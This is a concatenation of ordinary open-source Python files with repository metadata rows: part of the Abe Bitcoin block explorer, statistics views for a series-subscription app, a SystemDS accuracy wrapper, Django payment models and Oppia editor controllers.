page['content_type'] = 'application/javascript'
return (jsonp or "jsonp") + "(" + json.dumps(ret) + ")"
elif fmt == "svg":
page['content_type'] = 'image/svg+xml'
return ret
def q_totalbc(abe, page, chain):
"""shows the amount of currency ever mined."""
if chain is None:
return 'Shows the amount of currency ever mined.\n' \
'This differs from the amount in circulation when' \
' coins are destroyed, as happens frequently in Namecoin.\n' \
'Unlike http://blockexplorer.com/q/totalbc, this does not' \
' support future block numbers, and it returns a sum of' \
' observed generations rather than a calculated value.\n' \
'/chain/CHAIN/q/totalbc[/HEIGHT]\n'
height = path_info_uint(page, None)
if height is None:
row = abe.store.selectrow("""
SELECT b.block_total_satoshis
FROM chain c
LEFT JOIN block b ON (c.chain_last_block_id = b.block_id)
WHERE c.chain_id = ?
""", (chain.id,))
else:
row = abe.store.selectrow("""
SELECT b.block_total_satoshis
FROM chain_candidate cc
LEFT JOIN block b ON (b.block_id = cc.block_id)
WHERE cc.chain_id = ?
AND cc.block_height = ?
AND cc.in_longest = 1
""", (chain.id, height))
if not row:
return 'ERROR: block %d not seen yet' % (height,)
return format_satoshis(row[0], chain) if row else 0
def q_getreceivedbyaddress(abe, page, chain):
"""shows the amount ever received by a given address."""
addr = wsgiref.util.shift_path_info(page['env'])
if chain is None or addr is None:
return 'returns amount of money received by given address (not balance, sends are not subtracted)\n' \
'/chain/CHAIN/q/getreceivedbyaddress/ADDRESS\n'
if not util.possible_address(addr):
return 'ERROR: address invalid'
version, hash = util.decode_address(addr)
return format_satoshis(abe.store.get_received(chain.id, hash), chain)
def q_getsentbyaddress(abe, page, chain):
"""shows the amount ever sent from a given address."""
addr = wsgiref.util.shift_path_info(page['env'])
if chain is None or addr is None:
return 'returns amount of money sent from given address\n' \
'/chain/CHAIN/q/getsentbyaddress/ADDRESS\n'
if not util.possible_address(addr):
return 'ERROR: address invalid'
version, hash = util.decode_address(addr)
return format_satoshis(abe.store.get_sent(chain.id, hash), chain)
def q_addressbalance(abe, page, chain):
"""amount ever received minus amount ever sent by a given address."""
addr = wsgiref.util.shift_path_info(page['env'])
if chain is None or addr is None:
return 'returns amount of money at the given address\n' \
'/chain/CHAIN/q/addressbalance/ADDRESS\n'
if not util.possible_address(addr):
return 'ERROR: address invalid'
version, hash = util.decode_address(addr)
total = abe.store.get_balance(chain.id, hash)
return ("ERROR: please try again" if total is None else
format_satoshis(total, chain))
def q_fb(abe, page, chain):
"""returns an address's firstbits."""
if not abe.store.use_firstbits:
raise PageNotFound()
addr = wsgiref.util.shift_path_info(page['env'])
if addr is None:
return 'Shows ADDRESS\'s firstbits:' \
' the shortest initial substring that uniquely and' \
' case-insensitively distinguishes ADDRESS from all' \
' others first appearing before it or in the same block.\n' \
'See http://firstbits.com/.\n' \
'Returns empty if ADDRESS has no firstbits.\n' \
'/chain/CHAIN/q/fb/ADDRESS\n' \
'/q/fb/ADDRESS\n'
if not util.possible_address(addr):
return 'ERROR: address invalid'
version, dbhash = util.decode_address(addr)
ret = abe.store.get_firstbits(
address_version = version,
db_pubkey_hash = abe.store.binin(dbhash),
chain_id = (chain and chain.id))
if ret is None:
return 'ERROR: address not in the chain.'
return ret
def q_addr(abe, page, chain):
"""returns the full address having the given firstbits."""
if not abe.store.use_firstbits:
raise PageNotFound()
fb = wsgiref.util.shift_path_info(page['env'])
if fb is None:
return 'Shows the address identified by FIRSTBITS:' \
' the first address in CHAIN to start with FIRSTBITS,' \
' where the comparison is case-insensitive.\n' \
'See http://firstbits.com/.\n' \
'Returns the argument if none matches.\n' \
'/chain/CHAIN/q/addr/FIRSTBITS\n' \
'/q/addr/FIRSTBITS\n'
return "\n".join(abe.store.firstbits_to_addresses(
fb, chain_id = (chain and chain.id)))
def handle_download(abe, page):
name = abe.args.download_name
if name is None:
name = re.sub(r'\W+', '-', ABE_APPNAME.lower()) + '-' + ABE_VERSION
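        # tarfile only needs an object exposing write(); the lambda below
        # is a minimal stand-in whose write attribute is grafted onto the
        # WSGI write callable returned by start_response.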
fileobj = lambda: None
fileobj.func_dict['write'] = page['start_response'](
'200 OK',
[('Content-type', 'application/x-gtar-compressed'),
('Content-disposition', 'filename=' + name + '.tar.gz')])
import tarfile
with tarfile.TarFile.open(fileobj=fileobj, mode='w|gz',
format=tarfile.PAX_FORMAT) as tar:
tar.add(os.path.split(__file__)[0], name)
raise Streamed()
def serve_static(abe, path, start_response):
slen = len(abe.static_path)
if path[:slen] != abe.static_path:
raise PageNotFound()
path = path[slen:]
try:
# Serve static content.
# XXX Should check file modification time and handle HTTP
# if-modified-since. Or just hope serious users will map
# our htdocs as static in their web server.
# XXX is "+ '/' + path" adequate for non-POSIX systems?
found = open(abe.htdocs + '/' + path, "rb")
import mimetypes
type, enc = mimetypes.guess_type(path)
# XXX Should do something with enc if not None.
# XXX Should set Content-length.
start_response('200 OK', [('Content-type', type or 'text/plain')])
return found
except IOError:
raise PageNotFound()
# Change this if you want empty or multi-byte address versions.
def is_address_version(abe, v):
return len(v) == 1
def short_link(abe, page, link):
base = abe.base_url
if base is None:
env = page['env'].copy()
env['SCRIPT_NAME'] = posixpath.normpath(
posixpath.dirname(env['SCRIPT_NAME'] + env['PATH_INFO'])
+ '/' + page['dotdot'])
env['PATH_INFO'] = link
full = wsgiref.util.request_uri(env)
else:
full = base + link
return ['<p class="shortlink">Short Link: <a href="',
page['dotdot'], link, '">', full, '</a></p>\n']
def fix_path_info(abe, env):
ret = True
pi = env['PATH_INFO']
pi = posixpath.normpath(pi)
if pi[-1] != '/' and env['PATH_INFO'][-1:] == '/':
pi += '/'
if pi == '/':
pi += abe.home
            if '/' not in abe.home:
ret = False
if pi == env['PATH_INFO']:
ret = False
else:
env['PATH_INFO'] = pi
return ret
def find_htdocs():
return os.path.join(os.path.split(__file__)[0], 'htdocs')
def get_int_param(page, name):
vals = page['params'].get(name)
return vals and int(vals[0])
def path_info_uint(page, default):
ret = path_info_int(page, None)
if ret is None or ret < 0:
return default
return ret
def path_info_int(page, default):
s = wsgiref.util.shift_path_info(page['env'])
if s is None:
return default
try:
return int(s)
except ValueError:
return default
def format_time(nTime):
import time
return time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(int(nTime)))
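def _example_format_time():
    # Hedged sketch, not part of Abe: nTime values are Unix timestamps
    # rendered in UTC by format_time above.
    assert format_time(0) == '1970-01-01 00:00:00'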
def format_satoshis(satoshis, chain):
decimals = DEFAULT_DECIMALS if chain.decimals is None else chain.decimals
coin = 10 ** decimals
if satoshis is None:
return ''
if satoshis < 0:
return '-' + format_satoshis(-satoshis, chain)
satoshis = int(satoshis)
integer = satoshis / coin
frac = satoshis % coin
return (str(integer) +
('.' + (('0' * decimals) + str(frac))[-decimals:])
.rstrip('0').rstrip('.'))
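def _example_format_satoshis():
    # Hedged sketch, not part of Abe: a stub chain with 8 decimals shows
    # the fixed-point rendering and trailing-zero stripping above.
    class FakeChain(object):
        decimals = 8
    assert format_satoshis(123456789, FakeChain()) == '1.23456789'
    assert format_satoshis(100000000, FakeChain()) == '1'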
def format_difficulty(diff):
idiff = int(diff)
ret = '.%03d' % (int(round((diff - idiff) * 1000)),)
while idiff > 999:
ret = (' %03d' % (idiff % 1000,)) + ret
idiff = idiff / 1000
return str(idiff) + ret
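def _example_format_difficulty():
    # Hedged sketch, not part of Abe: thousands groups are separated by
    # spaces and exactly three fractional digits are shown.
    assert format_difficulty(0.5) == '0.500'
    assert format_difficulty(1234567.891) == '1 234 567.891'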
def hash_to_address_link(version, hash, dotdot, truncate_to=None, text=None):
if hash == DataStore.NULL_PUBKEY_HASH:
return 'Destroyed'
if hash is None:
return 'UNKNOWN'
addr = util.hash_to_address(version, hash)
if text is not None:
visible = text
elif truncate_to is None:
visible = addr
else:
visible = addr[:truncate_to] + '...'
return ['<a href="', dotdot, 'address/', addr, '">', visible, '</a>']
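def _example_hash_to_address_link():
    # Hedged sketch, not part of Abe: sentinel hashes render as plain
    # text rather than as links.
    assert hash_to_address_link('\0', None, '../') == 'UNKNOWN'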
def decode_script(script):
if script is None:
return ''
try:
return deserialize.decode_script(script)
    except KeyError:
return 'Nonstandard script'
def b58hex(b58):
try:
return base58.b58decode(b58, None).encode('hex_codec')
except Exception:
raise PageNotFound()
def hexb58(hex):
return base58.b58encode(hex.decode('hex_codec'))
def block_shortlink(block_hash):
zeroes = 0
for c in block_hash:
if c == '0':
zeroes += 1
else:
break
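    # Round down to an even count so the elided zeroes form whole bytes.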
zeroes &= ~1
return hexb58("%02x%s" % (zeroes / 2, block_hash[zeroes : zeroes+12]))
def shortlink_block(link):
try:
data = base58.b58decode(link, None)
except Exception:
raise PageNotFound()
return ('00' * ord(data[0])) + data[1:].encode('hex_codec')
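def _example_block_shortlink():
    # Hedged sketch, not part of Abe: a shortlink decodes back to a prefix
    # of the original hash. The sample value is the Bitcoin genesis block
    # hash, used purely as test data.
    h = ('000000000019d6689c085ae165831e93'
         '4ff763ae46a2a6c172b3f1b60a8ce26f')
    assert h.startswith(shortlink_block(block_shortlink(h)))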
def is_hash_prefix(s):
return HASH_PREFIX_RE.match(s) and len(s) >= HASH_PREFIX_MIN
def flatten(l):
if isinstance(l, list):
return ''.join(map(flatten, l))
if l is None:
raise Exception('NoneType in HTML conversion')
if isinstance(l, unicode):
return l
return str(l)
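def _example_flatten():
    # Hedged sketch, not part of Abe: page bodies are nested lists of
    # strings and numbers, rendered to HTML by flatten above.
    assert flatten(['<p>', ['Height: ', 123], '</p>']) == '<p>Height: 123</p>'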
def redirect(page):
uri = wsgiref.util.request_uri(page['env'])
page['start_response'](
'301 Moved Permanently',
[('Location', uri),
('Content-Type', 'text/html')])
return ('<html><head><title>Moved</title></head>\n'
'<body><h1>Moved</h1><p>This page has moved to '
'<a href="' + uri + '">' + uri + '</a></body></html>')
def serve(store):
args = store.args
abe = Abe(store, args)
if args.query is not None:
def start_response(status, headers):
pass
import urlparse
parsed = urlparse.urlparse(args.query)
print abe({
'SCRIPT_NAME': '',
'PATH_INFO': parsed.path,
'QUERY_STRING': parsed.query
}, start_response)
elif args.host or args.port:
# HTTP server.
if args.host is None:
args.host = "localhost"
from wsgiref.simple_server import make_server
port = int(args.port or 80)
httpd = make_server(args.host, port, abe)
abe.log.warning("Listening on http://%s:%d", args.host, port)
# httpd.shutdown() sometimes hangs, so don't call it. XXX
httpd.serve_forever()
else:
# FastCGI server.
from flup.server.fcgi import WSGIServer
# In the case where the web server starts Abe but can't signal
# it on server shutdown (because Abe runs as a different user)
# we arrange the following. FastCGI script passes its pid as
# --watch-pid=PID and enters an infinite loop. We check every
# minute whether it has terminated and exit when it has.
wpid = args.watch_pid
if wpid is not None:
wpid = int(wpid)
interval = 60.0 # XXX should be configurable.
from threading import Timer
import signal
def watch():
if not process_is_alive(wpid):
abe.log.warning("process %d terminated, exiting", wpid)
#os._exit(0) # sys.exit merely raises an exception.
os.kill(os.getpid(), signal.SIGTERM)
return
abe.log.log(0, "process %d found alive", wpid)
Timer(interval, watch).start()
Timer(interval, watch).start()
WSGIServer(abe).run()
def process_is_alive(pid):
# XXX probably fails spectacularly on Windows.
import errno
try:
os.kill(pid, 0)
return True
except OSError, e:
if e.errno == errno.EPERM:
return True # process exists, but we can't send it signals.
if e.errno == errno.ESRCH:
return False # no such process.
raise
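def _example_process_is_alive():
    # Hedged sketch, not part of Abe: a process can always signal-probe
    # itself, so this holds for the current pid.
    assert process_is_alive(os.getpid())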
def list_policies():
import pkgutil
import Chain
policies = []
for _, name, ispkg in pkgutil.iter_modules(path=[os.path.dirname(Chain.__file__)]):
if not ispkg:
policies.append(name)
return policies
def show_policy(policy):
import inspect
import Chain
try:
chain = Chain.create(policy)
except ImportError as e:
print("%s: policy unavailable (%s)" % (policy, e.message))
return
print("%s:" % policy)
parents = []
for cls in type(chain).__mro__[1:]:
if cls == Chain.BaseChain:
break
parents.append(cls)
if parents:
print(" Inherits from:")
for cls in parents:
print(" %s" % cls.__name__)
params = []
for attr in chain.POLICY_ATTRS:
val = getattr(chain, attr, None)
if val is not None:
params.append((attr, val))
if params:
print(" Parameters:")
for attr, val in params:
try:
try:
val = json.dumps(val)
except UnicodeError:
if type(val) == bytes:
# The value could be a magic number or address version.
val = json.dumps(unicode(val, 'latin_1'))
else:
val = repr(val)
except TypeError as e:
val = repr(val)
print(" %s: %s" % (attr, val))
doc = inspect.getdoc(chain)
if doc is not None:
print(" %s" % doc.replace('\n', '\n '))
def create_conf():
conf = {
"port": None,
"host": None,
"query": None,
"no_serve": None,
"no_load": None,
"debug": None,
"static_path": None,
"document_root": None,
"auto_agpl": None,
"download_name": None,
"watch_pid": None,
"base_url": None,
"logging": None,
"address_history_rows_max": None,
"shortlink_type": None,
"template": DEFAULT_TEMPLATE,
"template_vars": {
"ABE_URL": ABE_URL,
"APPNAME": ABE_APPNAME,
"VERSION": ABE_VERSION,
"COPYRIGHT": COPYRIGHT,
"COPYRIGHT_YEARS": COPYRIGHT_YEARS,
"COPYRIGHT_URL": COPYRIGHT_URL,
"DONATIONS_BTC": DONATIONS_BTC,
"DONATIONS_NMC": DONATIONS_NMC,
"CONTENT_TYPE": DEFAULT_CONTENT_TYPE,
"HOMEPAGE": DEFAULT_HOMEPAGE,
},
}
conf.update(DataStore.CONFIG_DEFAULTS)
return conf
def main(argv):
    if argv and argv[0] == '--show-policy':
for policy in argv[1:] or list_policies():
show_policy(policy)
return 0
elif argv[0] == '--list-policies':
print("Available chain policies:")
for name in list_policies():
print(" %s" % name)
return 0
args, argv = readconf.parse_argv(argv, create_conf())
if not argv:
pass
elif argv[0] in ('-h', '--help'):
print ("""Usage: python -m Abe.abe [-h] [--config=FILE] [--CONFIGVAR=VALUE]...
A Bitcoin block chain browser.
--help Show this help message and exit.
--version Show the program version and exit.
--print-htdocs-directory Show the static content directory name and exit.
--list-policies Show the available policy names for --datadir.
--show-policy POLICY... Describe the given policy.
--query /q/COMMAND Show the given URI content and exit.
--config FILE Read options from FILE.
All configuration variables may be given as command arguments.
See abe.conf for commented examples.""")
return 0
elif argv[0] in ('-v', '--version'):
print ABE_APPNAME, ABE_VERSION
print "Schema version", DataStore.SCHEMA_VERSION
return 0
elif argv[0] == '--print-htdocs-directory':
print find_htdocs()
return 0
else:
sys.stderr.write(
"Error: unknown option `%s'\n"
"See `python -m Abe.abe --help' for more information.\n"
% (argv[0],))
return 1
logging.basicConfig(
stream=sys.stdout,
level = logging.DEBUG if args.query is None else logging.ERROR,
format=DEFAULT_LOG_FORMAT)
if args.logging is not None:
import logging.config as logging_config
logging_config.dictConfig(args.logging)
if args.auto_agpl:
import tarfile
store = make_store(args)
if (not args.no_serve):
serve(store)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
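# Hedged usage sketch (illustrative; the port number is an assumption,
# flags are per --help above):
#     python -m Abe.abe --config abe.conf --port 2750
#     python -m Abe.abe --query /chain/Bitcoin/q/getblockcount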
| Max-Coin/maxcoin-abe | Abe/abe.py | Python | agpl-3.0 | 78,956 |
import datetime
from google.appengine.api.memcache import get_stats
from django.http import HttpResponse
from django.utils import simplejson as json
from subscription.models import Subscription, SubscriptionItem
from series.models import Show
def memcache(request):
return HttpResponse("%s" % get_stats())
def subscriptions(request):
now = datetime.datetime.now()
threshold = now - datetime.timedelta(days=30 * 3)
subcount = 0
for subscription in Subscription.all():
if subscription.last_visited is not None and subscription.last_visited > threshold:
subcount += 1
return HttpResponse("Done: \n%d" % subcount)
def subscribed_shows(request):
subcount = 0
show_ranking = {}
user_ranking = {}
for subitem in SubscriptionItem.all():
# if subscription.last_visited is not None and subscription.last_visited > threshold:
subcount += 1
show_ranking.setdefault(subitem._show, 0)
show_ranking[subitem._show] += 1
user_ranking.setdefault(subitem._subscription, 0)
user_ranking[subitem._subscription] += 1
tops = []
top_users = user_ranking.items()
for show in Show.all():
if show.active:
tops.append((show.name, show_ranking.get(show.key(), 0)))
tops.sort(key=lambda x: x[1], reverse=True)
top_users.sort(key=lambda x: x[1], reverse=True)
return HttpResponse("Done: <br/>%s" % "<br/>".join(map(lambda x: "%s: %d" % (x[0], x[1]), tops)) + "<hr/>" + "<br/>".join(map(lambda x: "%s: %d" % (x[0], x[1]), top_users)))
def dump_subscriptions(request):
users = {}
for subitem in SubscriptionItem.all():
# if subscription.last_visited is not None and subscription.last_visited > threshold:
users.setdefault(str(subitem._subscription), [])
users[str(subitem._subscription)].append(str(subitem._show))
return HttpResponse(json.dumps(users))
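# Hedged note (illustrative): the JSON emitted above maps each subscription
# key to the list of show keys it follows, e.g.
#     {"<subscription_key>": ["<show_key>", ...], ...}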
| maxgraser/seriesly | seriesly/statistics/views.py | Python | agpl-3.0 | 1,920 |
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/getAccuracy.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def getAccuracy(y: Matrix,
yhat: Matrix,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
params_dict = {'y': y, 'yhat': yhat}
params_dict.update(kwargs)
return Matrix(y.sds_context,
'getAccuracy',
named_input_nodes=params_dict)
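# Hedged usage sketch (not autogenerated; the surrounding API calls are
# assumptions based on the systemds Python bindings):
#     import numpy as np
#     from systemds.context import SystemDSContext
#     from systemds.operator.algorithm import getAccuracy
#     with SystemDSContext() as sds:
#         y = sds.from_numpy(np.array([[1.0], [2.0], [1.0]]))
#         yhat = sds.from_numpy(np.array([[1.0], [2.0], [2.0]]))
#         acc = getAccuracy(y, yhat).compute()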
| apache/incubator-systemml | src/main/python/systemds/operator/algorithm/builtin/getAccuracy.py | Python | apache-2.0 | 1,549 |
from django.db import models
# Create your models here.
class account(models.Model):
url = models.URLField(max_length=200, blank=True)
index_limit = models.IntegerField(default=0)
verified_status = models.BooleanField(blank=False, null=False, default=False, editable=False)
deposit_address = models.CharField(max_length=64)
spent = models.DecimalField(max_digits=8, decimal_places=8, default=0, editable=False)
hashtwo = models.CharField(max_length=64, editable=False)
class subkey(models.Model):
account_id = models.IntegerField()
subkey_index = models.IntegerField(verbose_name='Subkey Index:', blank=True, null=True)
hash = models.CharField(max_length=64)
hits = models.IntegerField(verbose_name='Hits:', blank=True, null=True)
last_accessed = models.DateTimeField(verbose_name="Last Accessed", null=True)
class transaction(models.Model):
id = models.DateTimeField(verbose_name='Date:', primary_key=True, auto_now=True, editable=False)
account_id = models.IntegerField()
btc_price = models.DecimalField(verbose_name='BTC Price:', max_digits=7, decimal_places=2)
btc_amount = models.DecimalField(verbose_name='BTC Amount:', max_digits=8, decimal_places=8, default=0, editable=False)
class access(models.Model):
    id = models.DateTimeField(verbose_name='Date', primary_key=True, auto_now=True, editable=False)
account_id = models.IntegerField(editable=False)
ipaddress = models.GenericIPAddressField(verbose_name='IP Address:', null=True, blank=True)
interface = models.CharField(verbose_name='Interface', max_length=23, null=False, blank=False)
class payment(models.Model):
    id = models.DateTimeField(verbose_name='Date', primary_key=True, auto_now=True, editable=False)
account_id = models.IntegerField(editable=False)
signed_tx = models.TextField()
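def top_subkeys_for_account(account_id, limit=5):
    # Hedged helper sketch, not part of the original app: fetch the
    # most-used subkeys for one account, using only fields defined above.
    return (subkey.objects.filter(account_id=account_id)
            .order_by('-hits')[:limit])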
| cryptoproofinfo/webapp | popsite/models.py | Python | apache-2.0 | 1,839 |
# coding: utf-8
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for the editor view."""
__author__ = 'sll@google.com (Sean Lip)'
import imghdr
import logging
from core.controllers import base
from core.domain import config_domain
from core.domain import dependency_registry
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import fs_domain
from core.domain import interaction_registry
from core.domain import rights_manager
from core.domain import rte_component_registry
from core.domain import skins_services
from core.domain import stats_services
from core.domain import user_services
from core.domain import value_generators_domain
from core.platform import models
current_user_services = models.Registry.import_current_user_services()
import feconf
import utils
import jinja2
# The frontend template for a new state. It is sent to the frontend when the
# exploration editor page is first loaded, so that new states can be
# added in a way that is completely client-side.
# IMPORTANT: Before adding this state to an existing exploration, the
# state name and the destination of the default rule should first be
# changed to the desired new state name.
NEW_STATE_TEMPLATE = {
'content': [{
'type': 'text',
'value': ''
}],
'interaction': exp_domain.State.NULL_INTERACTION_DICT,
'param_changes': [],
'unresolved_answers': {},
}
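# Hedged illustration, not part of Oppia: per the note above, client or
# server code is expected to copy the template and retarget it before use:
#     import copy
#     new_state = copy.deepcopy(NEW_STATE_TEMPLATE)
#     # ...rename the state and point its default rule at the new name...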
def get_value_generators_js():
"""Return a string that concatenates the JS for all value generators."""
all_value_generators = (
value_generators_domain.Registry.get_all_generator_classes())
value_generators_js = ''
for _, generator_cls in all_value_generators.iteritems():
value_generators_js += generator_cls.get_js_template()
return value_generators_js
VALUE_GENERATORS_JS = config_domain.ComputedProperty(
'value_generators_js', {'type': 'unicode'},
'JavaScript code for the value generators', get_value_generators_js)
MODERATOR_REQUEST_FORUM_URL_DEFAULT_VALUE = (
'https://moderator/request/forum/url')
MODERATOR_REQUEST_FORUM_URL = config_domain.ConfigProperty(
'moderator_request_forum_url', {'type': 'unicode'},
'A link to the forum for nominating explorations to be featured '
'in the gallery',
default_value=MODERATOR_REQUEST_FORUM_URL_DEFAULT_VALUE)
def _require_valid_version(version_from_payload, exploration_version):
"""Check that the payload version matches the given exploration version."""
if version_from_payload is None:
raise base.BaseHandler.InvalidInputException(
'Invalid POST request: a version must be specified.')
if version_from_payload != exploration_version:
raise base.BaseHandler.InvalidInputException(
'Trying to update version %s of exploration from version %s, '
'which is too old. Please reload the page and try again.'
% (exploration_version, version_from_payload))
def require_editor(handler):
"""Decorator that checks if the user can edit the given entity."""
def test_editor(self, exploration_id, escaped_state_name=None, **kwargs):
"""Gets the user and exploration id if the user can edit it.
Args:
self: the handler instance
exploration_id: the exploration id
escaped_state_name: the URL-escaped state name, if it exists
**kwargs: any other arguments passed to the handler
Returns:
The relevant handler, if the user is authorized to edit this
exploration.
Raises:
self.PageNotFoundException: if no such exploration or state exists.
self.UnauthorizedUserException: if the user exists but does not
have the right credentials.
"""
if not self.user_id:
self.redirect(current_user_services.create_login_url(
self.request.uri))
return
if self.username in config_domain.BANNED_USERNAMES.value:
raise self.UnauthorizedUserException(
'You do not have the credentials to access this page.')
try:
exploration = exp_services.get_exploration_by_id(exploration_id)
        except Exception:
raise self.PageNotFoundException
if not rights_manager.Actor(self.user_id).can_edit(exploration_id):
raise self.UnauthorizedUserException(
'You do not have the credentials to edit this exploration.',
self.user_id)
if not escaped_state_name:
return handler(self, exploration_id, **kwargs)
state_name = self.unescape_state_name(escaped_state_name)
if state_name not in exploration.states:
logging.error('Could not find state: %s' % state_name)
logging.error('Available states: %s' % exploration.states.keys())
raise self.PageNotFoundException
return handler(self, exploration_id, state_name, **kwargs)
return test_editor
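# Hedged illustration mirroring the real uses further below: editor-only
# endpoints wrap their handler methods with the decorator, e.g.
#     class MyExplorationHandler(EditorHandler):
#         @require_editor
#         def put(self, exploration_id):
#             ...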
class EditorHandler(base.BaseHandler):
"""Base class for all handlers for the editor page."""
# The page name to use as a key for generating CSRF tokens.
PAGE_NAME_FOR_CSRF = 'editor'
class ExplorationPage(EditorHandler):
"""The editor page for a single exploration."""
EDITOR_PAGE_DEPENDENCY_IDS = ['codemirror']
def get(self, exploration_id):
"""Handles GET requests."""
exploration = exp_services.get_exploration_by_id(
exploration_id, strict=False)
if (exploration is None or
not rights_manager.Actor(self.user_id).can_view(
exploration_id)):
self.redirect('/')
return
can_edit = (
bool(self.user_id) and
self.username not in config_domain.BANNED_USERNAMES.value and
rights_manager.Actor(self.user_id).can_edit(exploration_id))
value_generators_js = VALUE_GENERATORS_JS.value
interaction_ids = (
interaction_registry.Registry.get_all_interaction_ids())
interaction_dependency_ids = (
interaction_registry.Registry.get_deduplicated_dependency_ids(
interaction_ids))
dependencies_html, additional_angular_modules = (
dependency_registry.Registry.get_deps_html_and_angular_modules(
interaction_dependency_ids + self.EDITOR_PAGE_DEPENDENCY_IDS))
interaction_templates = (
rte_component_registry.Registry.get_html_for_all_components() +
interaction_registry.Registry.get_interaction_html(
interaction_ids))
interaction_validators_html = (
interaction_registry.Registry.get_validators_html(
interaction_ids))
skin_templates = skins_services.Registry.get_skin_templates(
skins_services.Registry.get_all_skin_ids())
self.values.update({
'INTERACTION_SPECS': interaction_registry.Registry.get_all_specs(),
'additional_angular_modules': additional_angular_modules,
'can_delete': rights_manager.Actor(
self.user_id).can_delete(exploration_id),
'can_edit': can_edit,
'can_modify_roles': rights_manager.Actor(
self.user_id).can_modify_roles(exploration_id),
'can_publicize': rights_manager.Actor(
self.user_id).can_publicize(exploration_id),
'can_publish': rights_manager.Actor(self.user_id).can_publish(
exploration_id),
'can_release_ownership': rights_manager.Actor(
self.user_id).can_release_ownership(exploration_id),
'can_unpublicize': rights_manager.Actor(
self.user_id).can_unpublicize(exploration_id),
'can_unpublish': rights_manager.Actor(self.user_id).can_unpublish(
exploration_id),
'dependencies_html': jinja2.utils.Markup(dependencies_html),
'interaction_templates': jinja2.utils.Markup(
interaction_templates),
'interaction_validators_html': jinja2.utils.Markup(
interaction_validators_html),
'moderator_request_forum_url': MODERATOR_REQUEST_FORUM_URL.value,
'nav_mode': feconf.NAV_MODE_CREATE,
'value_generators_js': jinja2.utils.Markup(value_generators_js),
'skin_js_urls': [
skins_services.Registry.get_skin_js_url(skin_id)
for skin_id in skins_services.Registry.get_all_skin_ids()],
'skin_templates': jinja2.utils.Markup(skin_templates),
'title': exploration.title,
'ALL_LANGUAGE_CODES': feconf.ALL_LANGUAGE_CODES,
'ALLOWED_INTERACTION_CATEGORIES': (
feconf.ALLOWED_INTERACTION_CATEGORIES),
# This is needed for the exploration preview.
'CATEGORIES_TO_COLORS': feconf.CATEGORIES_TO_COLORS,
'INVALID_PARAMETER_NAMES': feconf.INVALID_PARAMETER_NAMES,
'NEW_STATE_TEMPLATE': NEW_STATE_TEMPLATE,
'SHOW_SKIN_CHOOSER': feconf.SHOW_SKIN_CHOOSER,
'TAG_REGEX': feconf.TAG_REGEX,
})
self.render_template('editor/exploration_editor.html')
class ExplorationHandler(EditorHandler):
"""Page with editor data for a single exploration."""
PAGE_NAME_FOR_CSRF = 'editor'
def _get_exploration_data(self, exploration_id, version=None):
"""Returns a description of the given exploration."""
try:
exploration = exp_services.get_exploration_by_id(
exploration_id, version=version)
        except Exception:
raise self.PageNotFoundException
states = {}
for state_name in exploration.states:
state_dict = exploration.states[state_name].to_dict()
state_dict['unresolved_answers'] = (
stats_services.get_top_unresolved_answers_for_default_rule(
exploration_id, state_name))
states[state_name] = state_dict
editor_dict = {
'category': exploration.category,
'exploration_id': exploration_id,
'init_state_name': exploration.init_state_name,
'language_code': exploration.language_code,
'objective': exploration.objective,
'param_changes': exploration.param_change_dicts,
'param_specs': exploration.param_specs_dict,
'rights': rights_manager.get_exploration_rights(
exploration_id).to_dict(),
'show_state_editor_tutorial_on_load': (
self.user_id and not
self.user_has_started_state_editor_tutorial),
'states': states,
'tags': exploration.tags,
'title': exploration.title,
'version': exploration.version,
}
if feconf.SHOW_SKIN_CHOOSER:
editor_dict['all_skin_ids'] = (
skins_services.Registry.get_all_skin_ids())
editor_dict['default_skin_id'] = exploration.default_skin
return editor_dict
def get(self, exploration_id):
"""Gets the data for the exploration overview page."""
if not rights_manager.Actor(self.user_id).can_view(exploration_id):
raise self.PageNotFoundException
version = self.request.get('v', default_value=None)
self.values.update(
self._get_exploration_data(exploration_id, version=version))
self.render_json(self.values)
@require_editor
def put(self, exploration_id):
"""Updates properties of the given exploration."""
exploration = exp_services.get_exploration_by_id(exploration_id)
version = self.payload.get('version')
_require_valid_version(version, exploration.version)
commit_message = self.payload.get('commit_message')
change_list = self.payload.get('change_list')
try:
exp_services.update_exploration(
self.user_id, exploration_id, change_list, commit_message)
except utils.ValidationError as e:
raise self.InvalidInputException(e)
self.values.update(self._get_exploration_data(exploration_id))
self.render_json(self.values)
@require_editor
def delete(self, exploration_id):
"""Deletes the given exploration."""
role = self.request.get('role')
if not role:
role = None
if role == rights_manager.ROLE_ADMIN:
if not self.is_admin:
logging.error(
'%s tried to delete an exploration, but is not an admin.'
% self.user_id)
raise self.UnauthorizedUserException(
'User %s does not have permissions to delete exploration '
'%s' % (self.user_id, exploration_id))
elif role == rights_manager.ROLE_MODERATOR:
if not self.is_moderator:
logging.error(
'%s tried to delete an exploration, but is not a '
'moderator.' % self.user_id)
raise self.UnauthorizedUserException(
'User %s does not have permissions to delete exploration '
'%s' % (self.user_id, exploration_id))
elif role is not None:
raise self.InvalidInputException('Invalid role: %s' % role)
logging.info(
'%s %s tried to delete exploration %s' %
(role, self.user_id, exploration_id))
